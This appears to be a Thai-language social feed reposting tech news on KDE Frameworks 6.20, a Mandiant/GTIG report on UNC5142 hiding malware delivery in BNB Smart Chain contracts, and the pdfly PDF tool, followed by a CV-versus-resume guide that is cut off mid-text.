    KDE Project ได้ปล่อย KDE Frameworks 6.20 ซึ่งเป็นการอัปเดตรายเดือนที่มาพร้อมกับการปรับปรุงหลายด้าน โดยหนึ่งในฟีเจอร์ที่โดดเด่นคือ แอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ทำให้การเปลี่ยนหน้าการตั้งค่าดูราบรื่นและทันสมัยมากขึ้น ช่วยเพิ่มประสบการณ์ผู้ใช้ให้มีความเป็นธรรมชาติและสอดคล้องกับการออกแบบ UI สมัยใหม่

    นอกจากนี้ยังมีการปรับปรุง KRunner ให้สามารถจัดเรียงผลลัพธ์การค้นหาได้อย่างคาดเดาและเรียนรู้ได้ง่ายขึ้น ซึ่งช่วยให้ผู้ใช้เข้าถึงฟังก์ชันหรือแอปที่ต้องการได้รวดเร็วขึ้น โดยเฉพาะผู้ใช้ที่พึ่งพาการค้นหาภายในระบบเป็นหลัก

    KDE Frameworks 6.20 ยังแก้ไขบั๊กหลายรายการ เช่น ปัญหาการแสดงผลใน System Settings เมื่อเปิดด้วย kcmshell6, การแก้ไข Crash ของ Plasma เมื่อเปลี่ยนธีม, และการแก้ไขปัญหาการทำงานของ Plasma Discover ที่ทำให้ผู้ใช้ถูกถาม Feedback ทุกครั้งที่เปิดใช้งาน นอกจากนี้ยังมีการปรับปรุง Breeze icon theme ให้รองรับภาษา RTL เช่น อาหรับและฮีบรู รวมถึงการแก้ไขการแสดงผลใน GTK apps

    การอัปเดตนี้ยังเพิ่มความเข้ากันได้กับ Dark Color Scheme, ปรับปรุงการจัดการไฟล์ใน Flatpak apps และแก้ไขปัญหาการทำงานกับ NFS share เพื่อให้ระบบมีความเสถียรและปลอดภัยมากขึ้น ถือเป็นการอัปเดตที่สำคัญสำหรับผู้ใช้ KDE Plasma และแอป KDE ทั่วไป

    สรุปประเด็นสำคัญ
    ฟีเจอร์ใหม่ใน KDE Frameworks 6.20
    เพิ่มแอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings
    ปรับปรุงการจัดเรียงผลลัพธ์ KRunner ให้คาดเดาได้ง่ายขึ้น

    การแก้ไขบั๊กและปรับปรุง
    แก้ Crash ของ Plasma เมื่อเปลี่ยนธีม
    แก้ปัญหา Plasma Discover ที่ถาม Feedback ทุกครั้ง
    ปรับปรุง Breeze icon theme สำหรับภาษา RTL

    การปรับปรุงความเข้ากันได้
    รองรับ Dark Color Scheme ได้ดียิ่งขึ้น
    แก้ไขการทำงานกับ Flatpak apps และ NFS share

    คำเตือนสำหรับผู้ใช้ KDE
    หากไม่อัปเดตเป็นเวอร์ชันล่าสุด อาจยังพบปัญหา Crash และบั๊กเดิม
    การละเลยการอัปเดตอาจทำให้ระบบไม่เสถียรและเสี่ยงต่อการทำงานผิดพลาด

    https://9to5linux.com/kde-frameworks-6-20-adds-a-fancier-push-pop-animation-to-system-settings-pages
    🎨 KDE Frameworks 6.20 เพิ่มแอนิเมชันใหม่ใน System Settings KDE Project ได้ปล่อย KDE Frameworks 6.20 ซึ่งเป็นการอัปเดตรายเดือนที่มาพร้อมกับการปรับปรุงหลายด้าน โดยหนึ่งในฟีเจอร์ที่โดดเด่นคือ แอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ทำให้การเปลี่ยนหน้าการตั้งค่าดูราบรื่นและทันสมัยมากขึ้น ช่วยเพิ่มประสบการณ์ผู้ใช้ให้มีความเป็นธรรมชาติและสอดคล้องกับการออกแบบ UI สมัยใหม่ นอกจากนี้ยังมีการปรับปรุง KRunner ให้สามารถจัดเรียงผลลัพธ์การค้นหาได้อย่างคาดเดาและเรียนรู้ได้ง่ายขึ้น ซึ่งช่วยให้ผู้ใช้เข้าถึงฟังก์ชันหรือแอปที่ต้องการได้รวดเร็วขึ้น โดยเฉพาะผู้ใช้ที่พึ่งพาการค้นหาภายในระบบเป็นหลัก KDE Frameworks 6.20 ยังแก้ไขบั๊กหลายรายการ เช่น ปัญหาการแสดงผลใน System Settings เมื่อเปิดด้วย kcmshell6, การแก้ไข Crash ของ Plasma เมื่อเปลี่ยนธีม, และการแก้ไขปัญหาการทำงานของ Plasma Discover ที่ทำให้ผู้ใช้ถูกถาม Feedback ทุกครั้งที่เปิดใช้งาน นอกจากนี้ยังมีการปรับปรุง Breeze icon theme ให้รองรับภาษา RTL เช่น อาหรับและฮีบรู รวมถึงการแก้ไขการแสดงผลใน GTK apps การอัปเดตนี้ยังเพิ่มความเข้ากันได้กับ Dark Color Scheme, ปรับปรุงการจัดการไฟล์ใน Flatpak apps และแก้ไขปัญหาการทำงานกับ NFS share เพื่อให้ระบบมีความเสถียรและปลอดภัยมากขึ้น ถือเป็นการอัปเดตที่สำคัญสำหรับผู้ใช้ KDE Plasma และแอป KDE ทั่วไป 📌 สรุปประเด็นสำคัญ ✅ ฟีเจอร์ใหม่ใน KDE Frameworks 6.20 ➡️ เพิ่มแอนิเมชัน push/pop ที่สวยงามขึ้นใน System Settings ➡️ ปรับปรุงการจัดเรียงผลลัพธ์ KRunner ให้คาดเดาได้ง่ายขึ้น ✅ การแก้ไขบั๊กและปรับปรุง ➡️ แก้ Crash ของ Plasma เมื่อเปลี่ยนธีม ➡️ แก้ปัญหา Plasma Discover ที่ถาม Feedback ทุกครั้ง ➡️ ปรับปรุง Breeze icon theme สำหรับภาษา RTL ✅ การปรับปรุงความเข้ากันได้ ➡️ รองรับ Dark Color Scheme ได้ดียิ่งขึ้น ➡️ แก้ไขการทำงานกับ Flatpak apps และ NFS share ‼️ คำเตือนสำหรับผู้ใช้ KDE ⛔ หากไม่อัปเดตเป็นเวอร์ชันล่าสุด อาจยังพบปัญหา Crash และบั๊กเดิม ⛔ การละเลยการอัปเดตอาจทำให้ระบบไม่เสถียรและเสี่ยงต่อการทำงานผิดพลาด https://9to5linux.com/kde-frameworks-6-20-adds-a-fancier-push-pop-animation-to-system-settings-pages
    9TO5LINUX.COM
    KDE Frameworks 6.20 Adds a Fancier Push/Pop Animation to System Settings Pages - 9to5Linux
    KDE Frameworks 6.20 open-source software suite is out now with various improvements and bug fixes for KDE apps and the Plasma desktop.
    0 Comments 0 Shares 269 Views 0 Reviews
  • “UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ — เมื่อบล็อกเชนกลายเป็นเครื่องมืออาชญากรรมไซเบอร์” — จาก WordPress สู่ Smart Contract: การโจมตีที่ล่องหนและยากจะหยุด

    รายงานร่วมจาก Mandiant และ Google Threat Intelligence Group (GTIG) เปิดเผยการโจมตีไซเบอร์รูปแบบใหม่โดยกลุ่ม UNC5142 ซึ่งใช้เทคนิค “EtherHiding” บน BNB Smart Chain เพื่อซ่อนและส่งมัลแวร์ผ่าน smart contracts โดยไม่ต้องใช้เซิร์ฟเวอร์แบบเดิม

    แทนที่จะโฮสต์มัลแวร์บนโดเมนหรือ IP ที่สามารถถูกบล็อกได้ UNC5142 ฝัง payload ไว้ใน smart contract ที่อยู่บนบล็อกเชน ซึ่งมีคุณสมบัติ “เปลี่ยนไม่ได้” และ “ลบไม่ได้” ทำให้การตรวจจับและการลบแทบเป็นไปไม่ได้

    มัลแวร์เริ่มต้นจากการฝัง JavaScript บนเว็บไซต์ WordPress ที่ถูกเจาะ ซึ่งโหลดตัวดาวน์โหลดชื่อ CLEARSHORT — ตัวนี้จะเชื่อมต่อกับ BNB Smart Chain ผ่าน Web3.js เพื่อดึงสคริปต์ถัดไปจาก smart contract และแสดงหน้าต่างหลอกลวง เช่น “อัปเดตระบบ” หรือ “ตรวจสอบความปลอดภัย” เพื่อหลอกให้ผู้ใช้คลิก

    ระบบ smart contract ที่ใช้มี 3 ชั้น:

    1️⃣ ชั้นแรก: ทำหน้าที่เป็น router ชี้ไปยัง contract ถัดไป

    2️⃣ ชั้นสอง: ทำ reconnaissance และ fingerprinting เหยื่อ

    3️⃣ ชั้นสาม: เก็บ URL ของ payload และคีย์ AES สำหรับถอดรหัส

    การอัปเดต payload หรือคีย์สามารถทำได้ด้วยธุรกรรมราคาถูก (ประมาณ $0.25–$1.50) โดยไม่ต้องเปลี่ยนโค้ดหลักของ contract — ทำให้ระบบมีความยืดหยุ่นสูงและต้นทุนต่ำ

    UNC5142 ยังใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing เช่น reCAPTCHA ปลอม, หน้าความเป็นส่วนตัวปลอม, และหน้าตรวจสอบ bot ปลอม ซึ่งหลอกผู้ใช้ให้คลิกและติดมัลแวร์

    มัลแวร์ที่ใช้มีหลายตัว เช่น:

    CLEARSHORT: JavaScript downloader
    VIDAR และ LUMMAC.V2: สำหรับ Windows
    RADTHIEF: ขโมย credentials
    ATOMIC: สำหรับ macOS — ใช้ bash script และ bypass quarantine

    กลุ่มนี้ยังมีโครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) เพื่อหลบเลี่ยงการถูกปิดระบบ และใช้ wallet ที่เชื่อมโยงกับ OKX exchange ในการจ่ายค่าธุรกรรม

    UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์
    ฝัง payload ใน smart contract ที่ลบไม่ได้

    เริ่มต้นจากเว็บไซต์ WordPress ที่ถูกเจาะ
    โหลด CLEARSHORT JavaScript downloader

    ใช้ Web3.js เชื่อมต่อกับ smart contract เพื่อดึง payload
    แสดงหน้าต่างหลอกลวงให้เหยื่อคลิก

    Smart contract มี 3 ชั้น: router → reconnaissance → payload
    อัปเดตได้ด้วยธุรกรรมราคาถูก

    ใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing
    เช่น reCAPTCHA ปลอม และหน้าตรวจสอบ bot

    มัลแวร์ที่ใช้: CLEARSHORT, VIDAR, LUMMAC.V2, RADTHIEF, ATOMIC
    ครอบคลุมทั้ง Windows และ macOS

    โครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary)
    ใช้ wallet ที่เชื่อมโยงกับ OKX exchange

    https://securityonline.info/unc5142-uses-etherhiding-to-deploy-malware-via-bnb-smart-chain-smart-contracts/
    🛡️ “UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ — เมื่อบล็อกเชนกลายเป็นเครื่องมืออาชญากรรมไซเบอร์” — จาก WordPress สู่ Smart Contract: การโจมตีที่ล่องหนและยากจะหยุด รายงานร่วมจาก Mandiant และ Google Threat Intelligence Group (GTIG) เปิดเผยการโจมตีไซเบอร์รูปแบบใหม่โดยกลุ่ม UNC5142 ซึ่งใช้เทคนิค “EtherHiding” บน BNB Smart Chain เพื่อซ่อนและส่งมัลแวร์ผ่าน smart contracts โดยไม่ต้องใช้เซิร์ฟเวอร์แบบเดิม แทนที่จะโฮสต์มัลแวร์บนโดเมนหรือ IP ที่สามารถถูกบล็อกได้ UNC5142 ฝัง payload ไว้ใน smart contract ที่อยู่บนบล็อกเชน ซึ่งมีคุณสมบัติ “เปลี่ยนไม่ได้” และ “ลบไม่ได้” ทำให้การตรวจจับและการลบแทบเป็นไปไม่ได้ มัลแวร์เริ่มต้นจากการฝัง JavaScript บนเว็บไซต์ WordPress ที่ถูกเจาะ ซึ่งโหลดตัวดาวน์โหลดชื่อ CLEARSHORT — ตัวนี้จะเชื่อมต่อกับ BNB Smart Chain ผ่าน Web3.js เพื่อดึงสคริปต์ถัดไปจาก smart contract และแสดงหน้าต่างหลอกลวง เช่น “อัปเดตระบบ” หรือ “ตรวจสอบความปลอดภัย” เพื่อหลอกให้ผู้ใช้คลิก ระบบ smart contract ที่ใช้มี 3 ชั้น: 1️⃣ ชั้นแรก: ทำหน้าที่เป็น router ชี้ไปยัง contract ถัดไป 2️⃣ ชั้นสอง: ทำ reconnaissance และ fingerprinting เหยื่อ 3️⃣ ชั้นสาม: เก็บ URL ของ payload และคีย์ AES สำหรับถอดรหัส การอัปเดต payload หรือคีย์สามารถทำได้ด้วยธุรกรรมราคาถูก (ประมาณ $0.25–$1.50) โดยไม่ต้องเปลี่ยนโค้ดหลักของ contract — ทำให้ระบบมีความยืดหยุ่นสูงและต้นทุนต่ำ UNC5142 ยังใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing เช่น reCAPTCHA ปลอม, หน้าความเป็นส่วนตัวปลอม, และหน้าตรวจสอบ bot ปลอม ซึ่งหลอกผู้ใช้ให้คลิกและติดมัลแวร์ มัลแวร์ที่ใช้มีหลายตัว เช่น: 🐛 CLEARSHORT: JavaScript downloader 🐛 VIDAR และ LUMMAC.V2: สำหรับ Windows 🐛 RADTHIEF: ขโมย credentials 🐛 ATOMIC: สำหรับ macOS — ใช้ bash script และ bypass quarantine กลุ่มนี้ยังมีโครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) เพื่อหลบเลี่ยงการถูกปิดระบบ และใช้ wallet ที่เชื่อมโยงกับ OKX exchange ในการจ่ายค่าธุรกรรม ✅ UNC5142 ใช้ EtherHiding บน BNB Smart Chain เพื่อแพร่มัลแวร์ ➡️ ฝัง payload ใน smart contract ที่ลบไม่ได้ ✅ เริ่มต้นจากเว็บไซต์ WordPress ที่ถูกเจาะ ➡️ โหลด CLEARSHORT JavaScript downloader ✅ ใช้ Web3.js เชื่อมต่อกับ smart contract เพื่อดึง payload ➡️ แสดงหน้าต่างหลอกลวงให้เหยื่อคลิก ✅ Smart contract มี 3 ชั้น: router → reconnaissance → payload ➡️ อัปเดตได้ด้วยธุรกรรมราคาถูก ✅ ใช้ Cloudflare Pages เพื่อโฮสต์หน้า phishing ➡️ เช่น reCAPTCHA ปลอม และหน้าตรวจสอบ bot ✅ มัลแวร์ที่ใช้: CLEARSHORT, VIDAR, LUMMAC.V2, RADTHIEF, ATOMIC ➡️ ครอบคลุมทั้ง Windows และ macOS ✅ โครงสร้าง infrastructure แบบคู่ขนาน (Main และ Secondary) ➡️ ใช้ wallet ที่เชื่อมโยงกับ OKX exchange https://securityonline.info/unc5142-uses-etherhiding-to-deploy-malware-via-bnb-smart-chain-smart-contracts/
    SECURITYONLINE.INFO
    UNC5142 Uses EtherHiding to Deploy Malware via BNB Smart Chain Smart Contracts
    Mandiant exposed UNC5142 for using EtherHiding—hiding malicious JavaScript in BNB Smart Chain smart contracts—to create a resilient C2 and distribute VIDAR/ATOMIC to 14,000+ sites.
    0 Comments 0 Shares 301 Views 0 Reviews
  • “แฮ็กเกอร์ใช้เว็บ WordPress กว่า 14,000 แห่งแพร่มัลแวร์ผ่านบล็อกเชน” — เมื่อ ClickFix และ CLEARSHOT กลายเป็นอาวุธใหม่ในสงครามไซเบอร์

    Google Threat Intelligence Group (GTIG) เปิดเผยว่า กลุ่มแฮ็กเกอร์ UNC5142 ได้เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่งทั่วโลก เพื่อใช้เป็นฐานปล่อยมัลแวร์ โดยอาศัยเทคนิคใหม่ที่ผสาน JavaScript downloader กับบล็อกเชนสาธารณะเพื่อหลบเลี่ยงการตรวจจับและการปิดระบบ

    มัลแวร์ถูกส่งผ่านตัวดาวน์โหลดชื่อ “CLEARSHOT” ซึ่งฝังอยู่ในเว็บไซต์ที่ถูกแฮ็ก และจะดึง payload ระยะที่สองจากบล็อกเชน BNB chain โดยตรง จากนั้นจะโหลดหน้า landing page ที่เรียกว่า “CLEARSHORT” ซึ่งใช้กลยุทธ์ ClickFix หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run (Windows) หรือ Terminal (Mac) เพื่อรันมัลแวร์ด้วยตัวเอง

    การใช้บล็อกเชนทำให้โครงสร้างพื้นฐานของแฮ็กเกอร์มีความทนทานต่อการตรวจจับและการปิดระบบ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่ายเหมือนเว็บทั่วไป

    แม้กลุ่ม UNC5142 จะหยุดปฏิบัติการในเดือนกรกฎาคม 2025 แต่ GTIG เชื่อว่าพวกเขาอาจยังคงเคลื่อนไหวอยู่ โดยเปลี่ยนเทคนิคให้ซับซ้อนและตรวจจับยากขึ้น

    กลุ่ม UNC5142 เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่ง
    ใช้ช่องโหว่ในปลั๊กอิน, ธีม และฐานข้อมูล

    ใช้ JavaScript downloader ชื่อ “CLEARSHOT” เพื่อกระจายมัลแวร์
    ดึง payload ระยะที่สองจากบล็อกเชน BNB chain

    หน้า landing page “CLEARSHORT” ใช้กลยุทธ์ ClickFix
    หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run หรือ Terminal

    มัลแวร์ถูกโหลดจากเซิร์ฟเวอร์ภายนอกผ่าน Cloudflare .dev
    ข้อมูลถูกเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับ

    การใช้บล็อกเชนเพิ่มความทนทานต่อการปิดระบบ
    เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่าย

    GTIG เชื่อว่า UNC5142 ยังไม่เลิกปฏิบัติการจริง
    อาจเปลี่ยนเทคนิคเพื่อหลบเลี่ยงการตรวจจับ

    https://www.techradar.com/pro/security/thousands-of-web-pages-abused-by-hackers-to-spread-malware
    🕷️ “แฮ็กเกอร์ใช้เว็บ WordPress กว่า 14,000 แห่งแพร่มัลแวร์ผ่านบล็อกเชน” — เมื่อ ClickFix และ CLEARSHOT กลายเป็นอาวุธใหม่ในสงครามไซเบอร์ Google Threat Intelligence Group (GTIG) เปิดเผยว่า กลุ่มแฮ็กเกอร์ UNC5142 ได้เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่งทั่วโลก เพื่อใช้เป็นฐานปล่อยมัลแวร์ โดยอาศัยเทคนิคใหม่ที่ผสาน JavaScript downloader กับบล็อกเชนสาธารณะเพื่อหลบเลี่ยงการตรวจจับและการปิดระบบ มัลแวร์ถูกส่งผ่านตัวดาวน์โหลดชื่อ “CLEARSHOT” ซึ่งฝังอยู่ในเว็บไซต์ที่ถูกแฮ็ก และจะดึง payload ระยะที่สองจากบล็อกเชน BNB chain โดยตรง จากนั้นจะโหลดหน้า landing page ที่เรียกว่า “CLEARSHORT” ซึ่งใช้กลยุทธ์ ClickFix หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run (Windows) หรือ Terminal (Mac) เพื่อรันมัลแวร์ด้วยตัวเอง การใช้บล็อกเชนทำให้โครงสร้างพื้นฐานของแฮ็กเกอร์มีความทนทานต่อการตรวจจับและการปิดระบบ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่ายเหมือนเว็บทั่วไป แม้กลุ่ม UNC5142 จะหยุดปฏิบัติการในเดือนกรกฎาคม 2025 แต่ GTIG เชื่อว่าพวกเขาอาจยังคงเคลื่อนไหวอยู่ โดยเปลี่ยนเทคนิคให้ซับซ้อนและตรวจจับยากขึ้น ✅ กลุ่ม UNC5142 เจาะระบบเว็บไซต์ WordPress กว่า 14,000 แห่ง ➡️ ใช้ช่องโหว่ในปลั๊กอิน, ธีม และฐานข้อมูล ✅ ใช้ JavaScript downloader ชื่อ “CLEARSHOT” เพื่อกระจายมัลแวร์ ➡️ ดึง payload ระยะที่สองจากบล็อกเชน BNB chain ✅ หน้า landing page “CLEARSHORT” ใช้กลยุทธ์ ClickFix ➡️ หลอกให้เหยื่อคัดลอกคำสั่งไปวางใน Run หรือ Terminal ✅ มัลแวร์ถูกโหลดจากเซิร์ฟเวอร์ภายนอกผ่าน Cloudflare .dev ➡️ ข้อมูลถูกเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับ ✅ การใช้บล็อกเชนเพิ่มความทนทานต่อการปิดระบบ ➡️ เพราะข้อมูลไม่สามารถลบหรือเปลี่ยนแปลงได้ง่าย ✅ GTIG เชื่อว่า UNC5142 ยังไม่เลิกปฏิบัติการจริง ➡️ อาจเปลี่ยนเทคนิคเพื่อหลบเลี่ยงการตรวจจับ https://www.techradar.com/pro/security/thousands-of-web-pages-abused-by-hackers-to-spread-malware
    WWW.TECHRADAR.COM
    Thousands of web pages abused by hackers to spread malware
    More than 14,000 websites were seen distributing malware
    0 Comments 0 Shares 356 Views 0 Reviews
  • “pdfly: เครื่องมือสารพัดประโยชน์สำหรับจัดการไฟล์ PDF — จาก CLI สู่การเซ็นเอกสารและสร้าง booklet ได้ในคำสั่งเดียว”

    pdfly คือโปรเจกต์ใหม่ล่าสุดจากองค์กร py-pdf ที่เปิดตัวในปี 2022 โดย Martin Thoma เป็นเครื่องมือแบบ CLI (Command Line Interface) ที่เขียนด้วยภาษา Python โดยอิงจากไลบรารี fpdf2 และ pypdf จุดเด่นของ pdfly คือความสามารถในการจัดการไฟล์ PDF ได้หลากหลายรูปแบบ ตั้งแต่การดู metadata ไปจนถึงการเซ็นเอกสารและสร้าง booklet

    ในเวอร์ชันล่าสุด 0.5.0 ซึ่งเปิดตัวในเดือนตุลาคม 2025 มีฟีเจอร์ใหม่หลายอย่างที่เกิดจากการร่วมพัฒนาของนักพัฒนาผ่านกิจกรรม Hacktoberfest เช่น:

    pdfly sign สำหรับเซ็นเอกสาร PDF
    pdfly check-sign สำหรับตรวจสอบลายเซ็น
    pdfly extract-annotated-pages สำหรับดึงเฉพาะหน้าที่มี annotation
    pdfly rotate สำหรับหมุนหน้าต่าง ๆ ในเอกสาร

    นอกจากนี้ pdfly ยังสามารถรวมไฟล์ PDF (pdfly cat), ลบหน้า (pdfly rm), แปลงภาพเป็น PDF (pdfly x2pdf), บีบอัดไฟล์ (pdfly compress), สร้าง booklet (pdfly booklet) และแก้ไข xref table ที่เสียหายจากการแก้ไขด้วย text editor (pdfly update-offsets) ได้อีกด้วย

    https://chezsoi.org/lucas/blog/spotlight-on-pdfly.html
    📄 “pdfly: เครื่องมือสารพัดประโยชน์สำหรับจัดการไฟล์ PDF — จาก CLI สู่การเซ็นเอกสารและสร้าง booklet ได้ในคำสั่งเดียว” pdfly คือโปรเจกต์ใหม่ล่าสุดจากองค์กร py-pdf ที่เปิดตัวในปี 2022 โดย Martin Thoma เป็นเครื่องมือแบบ CLI (Command Line Interface) ที่เขียนด้วยภาษา Python โดยอิงจากไลบรารี fpdf2 และ pypdf จุดเด่นของ pdfly คือความสามารถในการจัดการไฟล์ PDF ได้หลากหลายรูปแบบ ตั้งแต่การดู metadata ไปจนถึงการเซ็นเอกสารและสร้าง booklet ในเวอร์ชันล่าสุด 0.5.0 ซึ่งเปิดตัวในเดือนตุลาคม 2025 มีฟีเจอร์ใหม่หลายอย่างที่เกิดจากการร่วมพัฒนาของนักพัฒนาผ่านกิจกรรม Hacktoberfest เช่น: ✒️ pdfly sign สำหรับเซ็นเอกสาร PDF ✒️ pdfly check-sign สำหรับตรวจสอบลายเซ็น ✒️ pdfly extract-annotated-pages สำหรับดึงเฉพาะหน้าที่มี annotation ✒️ pdfly rotate สำหรับหมุนหน้าต่าง ๆ ในเอกสาร นอกจากนี้ pdfly ยังสามารถรวมไฟล์ PDF (pdfly cat), ลบหน้า (pdfly rm), แปลงภาพเป็น PDF (pdfly x2pdf), บีบอัดไฟล์ (pdfly compress), สร้าง booklet (pdfly booklet) และแก้ไข xref table ที่เสียหายจากการแก้ไขด้วย text editor (pdfly update-offsets) ได้อีกด้วย https://chezsoi.org/lucas/blog/spotlight-on-pdfly.html
    CHEZSOI.ORG
    Spotlight on pdfly, the Swiss Army knife for PDF files
    Project documentation: pdfly.readthedocs.io pdfly is the youngest project of the py-pdf organization. It has been created by Martin Thoma in 2022. It's simply a CLI tool to manipulate PDF files, written in Python and based on the fpdf2 & pypdf libraries. I'm a maintainer of the project 🙂 What can …
    0 Comments 0 Shares 179 Views 0 Reviews
  • CV vs. Resume: What Are The Differences?

    When applying for jobs, you’ll need to prove to prospective employers that you have plenty of experience and accomplishments. In order to do this, you’ll need to show them either a CV or a resume. For American workers, these two terms are often used interchangeably to refer to a document that lists a person’s past work and major accomplishments. However, there are several differences between the two and confusing one for the other could majorly hurt your chances of landing that coveted position. To avoid disaster, let’s learn more about the difference between a CV and a resume.

    What is a CV?
    CV is short for curriculum vitae. A CV is a document that lists in detail a person’s education, certifications, professional background, professional expertise, publications (books, research papers, etc.), teaching experience, presentations, awards, grants, and research projects. A CV is compiled by a person applying for a job, fellowship, grant, or international career position.

    Typically, a CV is tailored to fit whatever position a person is applying for, with more relevant or valuable skills and experiences prioritized over others. A CV usually begins with a person’s educational qualifications, such as university degrees, fellowships, grants, and teaching experience. Most CVs are quite long and detailed, often listing many years worth of a person’s accomplishments and published works. Depending on the person, a CV that lists all of a person’s published books, lectures, and research papers could potentially be many pages in length.

    CV vs. resume
    In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country.

    When to use a CV
    While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background.

    Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume.

    When to use a resume
    In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments.

    When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications.

    Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification.

    What is a resume?
    A resume is a summary of a person’s past work experience, career accomplishments, personal accomplishments, skills, and qualifications. A resume is the document that Americans and Canadians need to have when applying for most jobs.

    Like a CV, a resume is typically adjusted to fit the specific job that a person is applying for, with more important or relevant experiences and accomplishments given priority. Typically, resumes are relatively short, usually only being one or two pages in length. In general, resumes lead with job histories and career accomplishments. While CVs tend to emphasize a person’s academic credentials, a resume tends to focus much more on what a person has done in their past work and how they can use that to succeed at a new job.

    In our comprehensive resume guide, we’ve provided three sample resumes you can use to follow along in this series and create your own format.

    CV vs. resume
    In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country.

    When to use a CV
    While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background.

    Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume.

    When to use a resume
    In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments.

    When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications.

    Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification.

    © 2025, Aakkhra, All rights reserved.
    CV vs. Resume: What Are The Differences? When applying for jobs, you’ll need to prove to prospective employers that you have plenty of experience and accomplishments. In order to do this, you’ll need to show them either a CV or a resume. For American workers, these two terms are often used interchangeably to refer to a document that lists a person’s past work and major accomplishments. However, there are several differences between the two and confusing one for the other could majorly hurt your chances of landing that coveted position. To avoid disaster, let’s learn more about the difference between a CV and a resume. What is a CV? CV is short for curriculum vitae. A CV is a document that lists in detail a person’s education, certifications, professional background, professional expertise, publications (books, research papers, etc.), teaching experience, presentations, awards, grants, and research projects. A CV is compiled by a person applying for a job, fellowship, grant, or international career position. Typically, a CV is tailored to fit whatever position a person is applying for, with more relevant or valuable skills and experiences prioritized over others. A CV usually begins with a person’s educational qualifications, such as university degrees, fellowships, grants, and teaching experience. Most CVs are quite long and detailed, often listing many years worth of a person’s accomplishments and published works. Depending on the person, a CV that lists all of a person’s published books, lectures, and research papers could potentially be many pages in length. CV vs. resume In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country. When to use a CV While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background. Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume. When to use a resume In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments. When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications. Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification. What is a resume? A resume is a summary of a person’s past work experience, career accomplishments, personal accomplishments, skills, and qualifications. A 